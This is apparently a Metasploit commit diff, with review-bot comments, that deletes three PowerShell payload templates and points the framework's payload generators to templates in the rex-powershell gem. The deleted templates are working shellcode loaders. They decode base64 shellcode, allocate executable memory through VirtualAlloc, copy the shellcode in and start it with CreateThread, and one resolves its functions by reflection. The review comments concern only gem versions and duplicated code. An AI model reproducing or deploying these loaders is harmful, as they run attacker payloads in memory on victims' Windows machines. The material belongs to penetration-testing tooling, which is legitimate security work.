use templates from the gem for psh
use the templates now contained within the magical gem of rex-powershell 7309 MS-2106bug/bundler_fix
parent
63ed5624ff
commit
af4f3e7a0d
|
@ -1,30 +0,0 @@
|
||||||
Set-StrictMode -Version 2
|
|
||||||
$%{var_syscode} = @"
|
|
||||||
using System;
|
|
||||||
using System.Runtime.InteropServices;
|
|
||||||
namespace %{var_kernel32} {
|
|
||||||
public class func {
|
|
||||||
[Flags] public enum AllocationType { Commit = 0x1000, Reserve = 0x2000 }
|
|
||||||
[Flags] public enum MemoryProtection { ExecuteReadWrite = 0x40 }
|
|
||||||
[Flags] public enum Time : uint { Infinite = 0xFFFFFFFF }
|
|
||||||
[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
|
|
||||||
[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
|
|
||||||
[DllImport("kernel32.dll")] public static extern int WaitForSingleObject(IntPtr hHandle, Time dwMilliseconds);
|
|
||||||
}
|
|
||||||
}
|
|
||||||
"@
|
|
||||||
|
|
||||||
$%{var_codeProvider} = New-Object Microsoft.CSharp.CSharpCodeProvider
|
|
||||||
$%{var_compileParams} = New-Object System.CodeDom.Compiler.CompilerParameters
|
|
||||||
$%{var_compileParams}.ReferencedAssemblies.AddRange(@("System.dll", [PsObject].Assembly.Location))
|
|
||||||
$%{var_compileParams}.GenerateInMemory = $True
|
|
||||||
$%{var_output} = $%{var_codeProvider}.CompileAssemblyFromSource($%{var_compileParams}, $%{var_syscode})
|
|
||||||
|
|
||||||
[Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}")
|
|
||||||
|
|
||||||
$%{var_baseaddr} = [%{var_kernel32}.func]::VirtualAlloc(0, $%{var_code}.Length + 1, [%{var_kernel32}.func+AllocationType]::Reserve -bOr [%{var_kernel32}.func+AllocationType]::Commit, [%{var_kernel32}.func+MemoryProtection]::ExecuteReadWrite)
|
|
||||||
if ([Bool]!$%{var_baseaddr}) { $global:result = 3; return }
|
|
||||||
[System.Runtime.InteropServices.Marshal]::Copy($%{var_code}, 0, $%{var_baseaddr}, $%{var_code}.Length)
|
|
||||||
[IntPtr] $%{var_threadHandle} = [%{var_kernel32}.func]::CreateThread(0,0,$%{var_baseaddr},0,0,0)
|
|
||||||
if ([Bool]!$%{var_threadHandle}) { $global:result = 7; return }
|
|
||||||
$%{var_temp} = [%{var_kernel32}.func]::WaitForSingleObject($%{var_threadHandle}, [%{var_kernel32}.func+Time]::Infinite)
|
|
|
@ -1,20 +0,0 @@
|
||||||
$%{var_syscode} = @"
|
|
||||||
[DllImport("kernel32.dll")]
|
|
||||||
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
|
|
||||||
[DllImport("kernel32.dll")]
|
|
||||||
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
|
|
||||||
[DllImport("msvcrt.dll")]
|
|
||||||
public static extern IntPtr memset(IntPtr dest, uint src, uint count);
|
|
||||||
"@
|
|
||||||
|
|
||||||
$%{var_win32_func} = Add-Type -memberDefinition $%{var_syscode} -Name "Win32" -namespace Win32Functions -passthru
|
|
||||||
|
|
||||||
%{shellcode}
|
|
||||||
|
|
||||||
$%{var_rwx} = $%{var_win32_func}::VirtualAlloc(0,[Math]::Max($%{var_code}.Length,0x1000),0x3000,0x40)
|
|
||||||
|
|
||||||
for ($%{var_iter}=0;$%{var_iter} -le ($%{var_code}.Length-1);$%{var_iter}++) {
|
|
||||||
$%{var_win32_func}::memset([IntPtr]($%{var_rwx}.ToInt32()+$%{var_iter}), $%{var_code}[$%{var_iter}], 1) | Out-Null
|
|
||||||
}
|
|
||||||
|
|
||||||
$%{var_win32_func}::CreateThread(0,0,$%{var_rwx},0,0,0)
|
|
|
@ -1,27 +0,0 @@
|
||||||
function %{func_get_proc_address} {
|
|
||||||
Param ($%{var_module}, $%{var_procedure})
|
|
||||||
$%{var_unsafe_native_methods} = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
|
|
||||||
|
|
||||||
return $%{var_unsafe_native_methods}.GetMethod('GetProcAddress').Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($%{var_unsafe_native_methods}.GetMethod('GetModuleHandle')).Invoke($null, @($%{var_module})))), $%{var_procedure}))
|
|
||||||
}
|
|
||||||
|
|
||||||
function %{func_get_delegate_type} {
|
|
||||||
Param (
|
|
||||||
[Parameter(Position = 0, Mandatory = $True)] [Type[]] $%{var_parameters},
|
|
||||||
[Parameter(Position = 1)] [Type] $%{var_return_type} = [Void]
|
|
||||||
)
|
|
||||||
|
|
||||||
$%{var_type_builder} = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
|
|
||||||
$%{var_type_builder}.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $%{var_parameters}).SetImplementationFlags('Runtime, Managed')
|
|
||||||
$%{var_type_builder}.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $%{var_return_type}, $%{var_parameters}).SetImplementationFlags('Runtime, Managed')
|
|
||||||
|
|
||||||
return $%{var_type_builder}.CreateType()
|
|
||||||
}
|
|
||||||
|
|
||||||
[Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}")
|
|
||||||
|
|
||||||
$%{var_buffer} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll VirtualAlloc), (%{func_get_delegate_type} @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $%{var_code}.Length,0x3000, 0x40)
|
|
||||||
[System.Runtime.InteropServices.Marshal]::Copy($%{var_code}, 0, $%{var_buffer}, $%{var_code}.length)
|
|
||||||
|
|
||||||
$%{var_hthread} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll CreateThread), (%{func_get_delegate_type} @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$%{var_buffer},[IntPtr]::Zero,0,[IntPtr]::Zero)
|
|
||||||
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll WaitForSingleObject), (%{func_get_delegate_type} @([IntPtr], [Int32]))).Invoke($%{var_hthread},0xffffffff) | Out-Null
|
|
|
@ -194,9 +194,7 @@ module Exploit::Powershell
|
||||||
unless opts.key? :shorten
|
unless opts.key? :shorten
|
||||||
opts[:shorten] = (datastore['Powershell::method'] != 'old')
|
opts[:shorten] = (datastore['Powershell::method'] != 'old')
|
||||||
end
|
end
|
||||||
template_path = File.join(Msf::Config.data_directory,
|
template_path = Rex::Powershell::Templates::TEMPLATE_DIR
|
||||||
"templates",
|
|
||||||
"scripts")
|
|
||||||
|
|
||||||
command = Rex::Powershell::Command.cmd_psh_payload(pay,
|
command = Rex::Powershell::Command.cmd_psh_payload(pay,
|
||||||
payload_arch,
|
payload_arch,
|
||||||
|
|
|
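Review bot: The new `template_path = Rex::Powershell::Templates::TEMPLATE_DIR` is resolved only when this code path runs, so if the rex-powershell version floor is not raised in the gemspec and Gemfile.lock as part of this change, an install with an older gem would fail with a NameError at payload generation time rather than at load; the branch name suggests a bundler fix accompanies this, but it is not visible in the hunk. Since the local is now only an alias for a gem constant that is forwarded to `cmd_psh_payload`, consider passing `Rex::Powershell::Templates::TEMPLATE_DIR` directly as the argument, or dropping the argument if the gem already defaults to its own template directory (that default is not visible from here). The enclosing method starts and ends outside the hunk.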
@ -1227,9 +1227,7 @@ require 'msf/core/exe/segment_appender'
|
||||||
# @param code [String]
|
# @param code [String]
|
||||||
#
|
#
|
||||||
def self.to_powershell_vba(framework, arch, code)
|
def self.to_powershell_vba(framework, arch, code)
|
||||||
template_path = File.join(Msf::Config.data_directory,
|
template_path = Rex::Powershell::Templates::TEMPLATE_DIR
|
||||||
"templates",
|
|
||||||
"scripts")
|
|
||||||
|
|
||||||
powershell = Rex::Powershell::Command.cmd_psh_payload(code,
|
powershell = Rex::Powershell::Command.cmd_psh_payload(code,
|
||||||
arch,
|
arch,
|
||||||
|
@ -1374,9 +1372,7 @@ require 'msf/core/exe/segment_appender'
|
||||||
end
|
end
|
||||||
|
|
||||||
def self.to_powershell_command(framework, arch, code)
|
def self.to_powershell_command(framework, arch, code)
|
||||||
template_path = File.join(Msf::Config.data_directory,
|
template_path = Rex::Powershell::Templates::TEMPLATE_DIR
|
||||||
"templates",
|
|
||||||
"scripts")
|
|
||||||
Rex::Powershell::Command.cmd_psh_payload(code,
|
Rex::Powershell::Command.cmd_psh_payload(code,
|
||||||
arch,
|
arch,
|
||||||
template_path,
|
template_path,
|
||||||
|
@ -1385,9 +1381,7 @@ require 'msf/core/exe/segment_appender'
|
||||||
end
|
end
|
||||||
|
|
||||||
def self.to_powershell_hta(framework, arch, code)
|
def self.to_powershell_hta(framework, arch, code)
|
||||||
template_path = File.join(Msf::Config.data_directory,
|
template_path = Rex::Powershell::Templates::TEMPLATE_DIR
|
||||||
"templates",
|
|
||||||
"scripts")
|
|
||||||
|
|
||||||
powershell = Rex::Powershell::Command.cmd_psh_payload(code,
|
powershell = Rex::Powershell::Command.cmd_psh_payload(code,
|
||||||
arch,
|
arch,
|
||||||
|
|
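Review bot: `template_path = Rex::Powershell::Templates::TEMPLATE_DIR` is now written identically in `to_powershell_vba`, `to_powershell_command` and `to_powershell_hta` (the hunks at -1227, -1374 and -1385), and in each the local is only forwarded to `cmd_psh_payload`; a single reference would be simpler, either passing `Rex::Powershell::Templates::TEMPLATE_DIR` directly in each call or hoisting it once, e.g. `PSH_TEMPLATE_DIR = Rex::Powershell::Templates::TEMPLATE_DIR` at module level. The constant is evaluated only when one of these methods runs, so the rex-powershell version floor should be raised with this change if that is not already done elsewhere in the commit, otherwise the failure would surface as a NameError during payload generation. Each of the three method bodies continues past its hunk.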